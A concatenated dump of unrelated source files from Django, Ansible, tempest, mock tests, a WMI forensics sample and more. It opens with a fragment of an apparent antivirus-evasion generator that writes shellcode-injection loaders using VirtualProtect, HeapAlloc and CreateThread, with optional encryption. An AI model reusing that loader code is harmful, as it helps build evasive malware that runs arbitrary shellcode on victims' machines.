payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alternative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from an Python IDE) and not recommeded for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
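# Hedged invocation sketch (the dotted test name is hypothetical):
#     python -m tests --testname tests.unit.test_feature.TestClass.test_function
# exercises the loadTestsFromNames branch above; without --testname, discover()
# walks --testpath for files matching --testpattern.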
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit |
theicfire/djangofun | django/core/management/commands/shell.py | 230 | 3263 | import os
from django.core.management.base import NoArgsCommand
from optparse import make_option
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--plain', action='store_true', dest='plain',
help='Tells Django to use plain Python, not IPython.'),
)
help = "Runs a Python interactive interpreter. Tries to use IPython, if it's available."
shells = ['ipython', 'bpython']
requires_model_validation = False
def ipython(self):
try:
from IPython.frontend.terminal.embed import TerminalInteractiveShell
shell = TerminalInteractiveShell()
shell.mainloop()
except ImportError:
# IPython < 0.11
# Explicitly pass an empty list as arguments, because otherwise
# IPython would use sys.argv from this script.
try:
from IPython.Shell import IPShell
shell = IPShell(argv=[])
shell.mainloop()
except ImportError:
# IPython not found at all, raise ImportError
raise
def bpython(self):
import bpython
bpython.embed()
def run_shell(self):
for shell in self.shells:
try:
return getattr(self, shell)()
except ImportError:
pass
raise ImportError
def handle_noargs(self, **options):
# XXX: (Temporary) workaround for ticket #1796: force early loading of all
# models from installed apps.
from django.db.models.loading import get_models
loaded_models = get_models()
use_plain = options.get('plain', False)
try:
if use_plain:
# Don't bother loading IPython, because the user wants plain Python.
raise ImportError
self.run_shell()
except ImportError:
import code
# Set up a dictionary to serve as the environment for the shell, so
# that tab completion works on objects that are imported at runtime.
# See ticket 5082.
imported_objects = {}
try: # Try activating rlcompleter, because it's handy.
import readline
except ImportError:
pass
else:
# We don't have to wrap the following import in a 'try', because
# we already know 'readline' was imported successfully.
import rlcompleter
readline.set_completer(rlcompleter.Completer(imported_objects).complete)
readline.parse_and_bind("tab:complete")
# We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
# conventions and get $PYTHONSTARTUP first then import user.
if not use_plain:
pythonrc = os.environ.get("PYTHONSTARTUP")
if pythonrc and os.path.isfile(pythonrc):
try:
execfile(pythonrc)
except NameError:
pass
# This will import .pythonrc.py as a side-effect
import user
code.interact(local=imported_objects)
| bsd-3-clause |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 |
cyberark-bizdev/ansible | lib/ansible/modules/windows/win_command.py | 23 | 4430 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Ansible, inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_command
short_description: Executes a command on a remote Windows node
version_added: 2.2
description:
- The C(win_command) module takes the command name followed by a list of space-delimited arguments.
- The given command will be executed on all selected nodes. It will not be
processed through the shell, so variables like C($env:HOME) and operations
like C("<"), C(">"), C("|"), and C(";") will not work (use the M(win_shell)
module if you need these features).
- For non-Windows targets, use the M(command) module instead.
options:
free_form:
description:
- the C(win_command) module takes a free form command to run. There is no parameter actually named 'free form'.
See the examples!
required: true
creates:
description:
- a path or path filter pattern; when the referenced path exists on the target host, the task will be skipped.
removes:
description:
- a path or path filter pattern; when the referenced path B(does not) exist on the target host, the task will be skipped.
chdir:
description:
- set the specified path as the current working directory before executing a command.
stdin:
description:
- Set the stdin of the command directly to the specified value.
version_added: '2.5'
notes:
- If you want to run a command through a shell (say you are using C(<),
C(>), C(|), etc), you actually want the M(win_shell) module instead. The
C(win_command) module is much more secure as it's not affected by the user's
environment.
- C(creates), C(removes), and C(chdir) can be specified after the command. For instance, if you only want to run a command if a certain file does not
exist, use this.
- For non-Windows targets, use the M(command) module instead.
author:
- Matt Davis
'''
EXAMPLES = r'''
- name: Save the result of 'whoami' in 'whoami_out'
win_command: whoami
register: whoami_out
- name: Run command that only runs if folder exists and runs from a specific folder
win_command: wbadmin -backupTarget:C:\backup\
args:
chdir: C:\somedir\
creates: C:\backup\
- name: Run an executable and send data to the stdin for the executable
win_command: powershell.exe -
args:
stdin: Write-Host test
'''
RETURN = r'''
msg:
description: changed
returned: always
type: boolean
sample: True
start:
description: The command execution start time
returned: always
type: string
sample: '2016-02-25 09:18:26.429568'
end:
description: The command execution end time
returned: always
type: string
sample: '2016-02-25 09:18:26.755339'
delta:
description: The command execution delta time
returned: always
type: string
sample: '0:00:00.325771'
stdout:
description: The command standard output
returned: always
type: string
sample: 'Clustering node rabbit@slave1 with rabbit@master ...'
stderr:
description: The command standard error
returned: always
type: string
sample: 'ls: cannot access foo: No such file or directory'
cmd:
description: The command executed by the task
returned: always
type: string
sample: 'rabbitmqctl join_cluster rabbit@master'
rc:
description: The command return code (0 means success)
returned: always
type: int
sample: 0
stdout_lines:
description: The command standard output split in lines
returned: always
type: list
sample: [u'Clustering node rabbit@slave1 with rabbit@master ...']
'''
| gpl-3.0 |
BT-ojossen/stock-logistics-workflow | __unported__/stock_location_flow_creator/product_pulled_flow_template.py | 33 | 1731 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Vaucher (Camptocamp)
# Copyright 2012 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Template of product pulled flow object """
from openerp.osv.orm import Model
from openerp.addons.stock_orderpoint_creator.base_product_config_template import BaseProductConfigTemplate
class ProductPulledFlow(BaseProductConfigTemplate, Model):
_name = 'product.pulled.flow.template'
_inherit = 'product.pulled.flow'
_table = 'product_pulled_flow_template'
_clean_mode = 'unlink'
def _get_ids_2_clean(self, cursor, uid, template_br, product_ids, context=None):
""" hook to select model specific objects to clean
return must return a list of id"""
model_obj = self._get_model()
ids_to_del = model_obj.search(cursor, uid,
[('product_id', 'in', product_ids)])
return ids_to_del
| agpl-3.0 |
burzillibus/RobHome | venv/lib/python2.7/site-packages/django/contrib/gis/geos/collections.py | 51 | 5160 | """
This module houses the Geometry Collection objects:
GeometryCollection, MultiPoint, MultiLineString, and MultiPolygon
"""
import json
import warnings
from ctypes import byref, c_int, c_uint
from django.contrib.gis.geos import prototypes as capi
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry, LinearGeometryMixin
from django.contrib.gis.geos.libgeos import geos_version_info, get_pointer_arr
from django.contrib.gis.geos.linestring import LinearRing, LineString
from django.contrib.gis.geos.point import Point
from django.contrib.gis.geos.polygon import Polygon
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six.moves import range
class GeometryCollection(GEOSGeometry):
_typeid = 7
def __init__(self, *args, **kwargs):
"Initializes a Geometry Collection from a sequence of Geometry objects."
# Checking the arguments
if len(args) == 1:
# If only one geometry provided or a list of geometries is provided
# in the first argument.
if isinstance(args[0], (tuple, list)):
init_geoms = args[0]
else:
init_geoms = args
else:
init_geoms = args
# Ensuring that only the permitted geometries are allowed in this collection
# this is moved to list mixin super class
self._check_allowed(init_geoms)
# Creating the geometry pointer array.
collection = self._create_collection(len(init_geoms), iter(init_geoms))
super(GeometryCollection, self).__init__(collection, **kwargs)
def __iter__(self):
"Iterates over each Geometry in the Collection."
for i in range(len(self)):
yield self[i]
def __len__(self):
"Returns the number of geometries in this Collection."
return self.num_geom
# ### Methods for compatibility with ListMixin ###
def _create_collection(self, length, items):
# Creating the geometry pointer array.
geoms = get_pointer_arr(length)
for i, g in enumerate(items):
# this is a little sloppy, but makes life easier
# allow GEOSGeometry types (python wrappers) or pointer types
geoms[i] = capi.geom_clone(getattr(g, 'ptr', g))
return capi.create_collection(c_int(self._typeid), byref(geoms), c_uint(length))
def _get_single_internal(self, index):
return capi.get_geomn(self.ptr, index)
def _get_single_external(self, index):
"Returns the Geometry from this Collection at the given index (0-based)."
# Checking the index and returning the corresponding GEOS geometry.
return GEOSGeometry(capi.geom_clone(self._get_single_internal(index)), srid=self.srid)
def _set_list(self, length, items):
"Create a new collection, and destroy the contents of the previous pointer."
prev_ptr = self.ptr
srid = self.srid
self.ptr = self._create_collection(length, items)
if srid:
self.srid = srid
capi.destroy_geom(prev_ptr)
_set_single = GEOSGeometry._set_single_rebuild
_assign_extended_slice = GEOSGeometry._assign_extended_slice_rebuild
@property
def json(self):
if self.__class__.__name__ == 'GeometryCollection':
return json.dumps({
'type': self.__class__.__name__,
'geometries': [
{'type': geom.__class__.__name__, 'coordinates': geom.coords}
for geom in self
],
})
return super(GeometryCollection, self).json
geojson = json
@property
def kml(self):
"Returns the KML for this Geometry Collection."
return '<MultiGeometry>%s</MultiGeometry>' % ''.join(g.kml for g in self)
@property
def tuple(self):
"Returns a tuple of all the coordinates in this Geometry Collection"
return tuple(g.tuple for g in self)
coords = tuple
# MultiPoint, MultiLineString, and MultiPolygon class definitions.
class MultiPoint(GeometryCollection):
_allowed = Point
_typeid = 4
class MultiLineString(LinearGeometryMixin, GeometryCollection):
_allowed = (LineString, LinearRing)
_typeid = 5
@property
def closed(self):
if geos_version_info()['version'] < '3.5':
raise GEOSException("MultiLineString.closed requires GEOS >= 3.5.0.")
return super(MultiLineString, self).closed
class MultiPolygon(GeometryCollection):
_allowed = Polygon
_typeid = 6
@property
def cascaded_union(self):
"Returns a cascaded union of this MultiPolygon."
warnings.warn(
"`cascaded_union` is deprecated, use the `unary_union` property instead.",
RemovedInDjango20Warning, 2
)
return GEOSGeometry(capi.geos_cascaded_union(self.ptr), self.srid)
# Setting the allowed types here since GeometryCollection is defined before
# its subclasses.
GeometryCollection._allowed = (Point, LineString, LinearRing, Polygon, MultiPoint, MultiLineString, MultiPolygon)
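# A minimal usage sketch (not part of Django; illustrative only, and it
# assumes the GEOS C library is available at runtime):
#
#     from django.contrib.gis.geos import MultiPoint, Point
#     mp = MultiPoint(Point(0, 0), Point(1, 1))
#     mp.coords   # ((0.0, 0.0), (1.0, 1.0)), via the `tuple` property above
#     mp.kml      # '<MultiGeometry>...</MultiGeometry>'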
| mit |
Shao-Feng/crosswalk-test-suite | webapi/tct-ui-css3-tests/inst.apk.py | 1996 | 3186 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PARAMETERS = None
ADB_CMD = "adb"
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".apk"):
cmd = "%s -s %s uninstall org.xwalk.%s" % (
ADB_CMD, PARAMETERS.device, os.path.basename(os.path.splitext(file)[0]))
(return_code, output) = doCMD(cmd)
for line in output:
if "Failure" in line:
action_status = False
break
return action_status
def instPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".apk"):
cmd = "%s -s %s install %s" % (ADB_CMD,
PARAMETERS.device, os.path.join(root, file))
(return_code, output) = doCMD(cmd)
for line in output:
if "Failure" in line:
action_status = False
break
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.device:
(return_code, output) = doCMD("adb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
if not PARAMETERS.device:
print "No device found"
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
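# Illustrative shell usage (flags mirror the OptionParser above; the device
# serial is a placeholder):
#   python inst.apk.py -s emulator-5554 -i    # install every .apk under SCRIPT_DIR
#   python inst.apk.py -s emulator-5554 -u    # uninstall the same packages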
| bsd-3-clause |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
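# Illustrative invocation (the repository path is an assumption -- python-cim
# expects the directory holding the CIM repository files such as OBJECTS.DATA):
#   python show_CCM_RecentlyUsedApps.py win7 /evidence/CIM/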
| apache-2.0 |
GeyerA/android_external_chromium_org | native_client_sdk/src/build_tools/tests/sdktools_config_test.py | 160 | 1609 | #!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import os
import unittest
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
BUILD_TOOLS_DIR = os.path.dirname(SCRIPT_DIR)
sys.path.append(BUILD_TOOLS_DIR)
import sdk_tools.config as config
class TestSdkToolsConfig(unittest.TestCase):
def testInvalidSyntax(self):
invalid_json = "# oops\n"
cfg = config.Config()
self.assertRaises(config.Error, lambda: cfg.LoadJson(invalid_json))
def testEmptyConfig(self):
"""Test that empty config contains just empty sources list."""
expected = '{\n "sources": []\n}'
cfg = config.Config()
json_output = cfg.ToJson()
self.assertEqual(json_output, expected)
def testIntegerSetting(self):
json_input = '{ "setting": 3 }'
cfg = config.Config()
cfg.LoadJson(json_input)
self.assertEqual(cfg.setting, 3)
def testReadWrite(self):
json_input1 = '{\n "sources": [], \n "setting": 3\n}'
json_input2 = '{\n "setting": 3\n}'
for json_input in (json_input1, json_input2):
cfg = config.Config()
cfg.LoadJson(json_input)
json_output = cfg.ToJson()
self.assertEqual(json_output, json_input1)
def testAddSource(self):
cfg = config.Config()
cfg.AddSource('http://localhost/foo')
json_output = cfg.ToJson()
expected = '{\n "sources": [\n "http://localhost/foo"\n ]\n}'
self.assertEqual(json_output, expected)
if __name__ == '__main__':
unittest.main()
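# Round-trip sketch mirroring testReadWrite above (illustrative):
#   cfg = config.Config()
#   cfg.LoadJson('{ "setting": 3 }')
#   cfg.ToJson()   # -> '{\n  "sources": [], \n  "setting": 3\n}'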
| bsd-3-clause |
40223125/40223125-2 | static/Brython3.1.1-20150328-091302/Lib/unittest/test/testmock/testwith.py | 739 | 5806 | import unittest
from warnings import catch_warnings
from unittest.test.testmock.support import is_instance
from unittest.mock import MagicMock, Mock, patch, sentinel, mock_open, call
something = sentinel.Something
something_else = sentinel.SomethingElse
class WithTest(unittest.TestCase):
def test_with_statement(self):
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
self.assertEqual(something, sentinel.Something)
def test_with_statement_exception(self):
try:
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
raise Exception('pow')
except Exception:
pass
else:
self.fail("patch swallowed exception")
self.assertEqual(something, sentinel.Something)
def test_with_statement_as(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertTrue(is_instance(mock_something, MagicMock),
"patching wrong type")
self.assertEqual(something, sentinel.Something)
def test_patch_object_with_statement(self):
class Foo(object):
something = 'foo'
original = Foo.something
with patch.object(Foo, 'something'):
self.assertNotEqual(Foo.something, original, "unpatched")
self.assertEqual(Foo.something, original)
def test_with_statement_nested(self):
with catch_warnings(record=True):
with patch('%s.something' % __name__) as mock_something, patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_with_statement_specified(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(mock_something, sentinel.Patched, "wrong patch")
self.assertEqual(something, sentinel.Something)
def testContextManagerMocking(self):
mock = Mock()
mock.__enter__ = Mock()
mock.__exit__ = Mock()
mock.__exit__.return_value = False
with mock as m:
self.assertEqual(m, mock.__enter__.return_value)
mock.__enter__.assert_called_with()
mock.__exit__.assert_called_with(None, None, None)
def test_context_manager_with_magic_mock(self):
mock = MagicMock()
with self.assertRaises(TypeError):
with mock:
'foo' + 3
mock.__enter__.assert_called_with()
self.assertTrue(mock.__exit__.called)
def test_with_statement_same_attribute(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something' % __name__) as mock_again:
self.assertEqual(something, mock_again, "unpatched")
self.assertEqual(something, mock_something,
"restored with wrong instance")
self.assertEqual(something, sentinel.Something, "not restored")
def test_with_statement_imbricated(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_dict_context_manager(self):
foo = {}
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
self.assertEqual(foo, {})
with self.assertRaises(NameError):
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
raise NameError('Konrad')
self.assertEqual(foo, {})
class TestMockOpen(unittest.TestCase):
def test_mock_open(self):
mock = mock_open()
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_mock_open_context_manager(self):
mock = mock_open()
handle = mock.return_value
with patch('%s.open' % __name__, mock, create=True):
with open('foo') as f:
f.read()
expected_calls = [call('foo'), call().__enter__(), call().read(),
call().__exit__(None, None, None)]
self.assertEqual(mock.mock_calls, expected_calls)
self.assertIs(f, handle)
def test_explicit_mock(self):
mock = MagicMock()
mock_open(mock)
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_read_data(self):
mock = mock_open(read_data='foo')
with patch('%s.open' % __name__, mock, create=True):
h = open('bar')
result = h.read()
self.assertEqual(result, 'foo')
if __name__ == '__main__':
unittest.main()
| gpl-3.0 |
zsoltdudas/lis-tempest | tempest/lib/services/identity/v3/token_client.py | 5 | 6905 | # Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
from tempest.lib.common import rest_client
from tempest.lib import exceptions
class V3TokenClient(rest_client.RestClient):
def __init__(self, auth_url, disable_ssl_certificate_validation=None,
ca_certs=None, trace_requests=None):
dscv = disable_ssl_certificate_validation
super(V3TokenClient, self).__init__(
None, None, None, disable_ssl_certificate_validation=dscv,
ca_certs=ca_certs, trace_requests=trace_requests)
if auth_url is None:
raise exceptions.IdentityError("Couldn't determine auth_url")
if 'auth/tokens' not in auth_url:
auth_url = auth_url.rstrip('/') + '/auth/tokens'
self.auth_url = auth_url
def auth(self, user_id=None, username=None, password=None, project_id=None,
project_name=None, user_domain_id=None, user_domain_name=None,
project_domain_id=None, project_domain_name=None, domain_id=None,
domain_name=None, token=None):
"""Obtains a token from the authentication service
:param user_id: user id
:param username: user name
:param user_domain_id: the user domain id
:param user_domain_name: the user domain name
:param project_domain_id: the project domain id
:param project_domain_name: the project domain name
:param domain_id: a domain id to scope to
:param domain_name: a domain name to scope to
:param project_id: a project id to scope to
:param project_name: a project name to scope to
:param token: a token to re-scope.
Accepts different combinations of credentials.
        Sample valid combinations:
- token
- token, project_name, project_domain_id
- user_id, password
- username, password, user_domain_id
- username, password, project_name, user_domain_id, project_domain_id
Validation is left to the server side.
"""
creds = {
'auth': {
'identity': {
'methods': [],
}
}
}
id_obj = creds['auth']['identity']
if token:
id_obj['methods'].append('token')
id_obj['token'] = {
'id': token
}
if (user_id or username) and password:
id_obj['methods'].append('password')
id_obj['password'] = {
'user': {
'password': password,
}
}
if user_id:
id_obj['password']['user']['id'] = user_id
else:
id_obj['password']['user']['name'] = username
_domain = None
if user_domain_id is not None:
_domain = dict(id=user_domain_id)
elif user_domain_name is not None:
_domain = dict(name=user_domain_name)
if _domain:
id_obj['password']['user']['domain'] = _domain
if (project_id or project_name):
_project = dict()
if project_id:
_project['id'] = project_id
elif project_name:
_project['name'] = project_name
if project_domain_id is not None:
_project['domain'] = {'id': project_domain_id}
elif project_domain_name is not None:
_project['domain'] = {'name': project_domain_name}
creds['auth']['scope'] = dict(project=_project)
elif domain_id:
creds['auth']['scope'] = dict(domain={'id': domain_id})
elif domain_name:
creds['auth']['scope'] = dict(domain={'name': domain_name})
body = json.dumps(creds, sort_keys=True)
resp, body = self.post(self.auth_url, body=body)
self.expected_success(201, resp.status)
return rest_client.ResponseBody(resp, body)
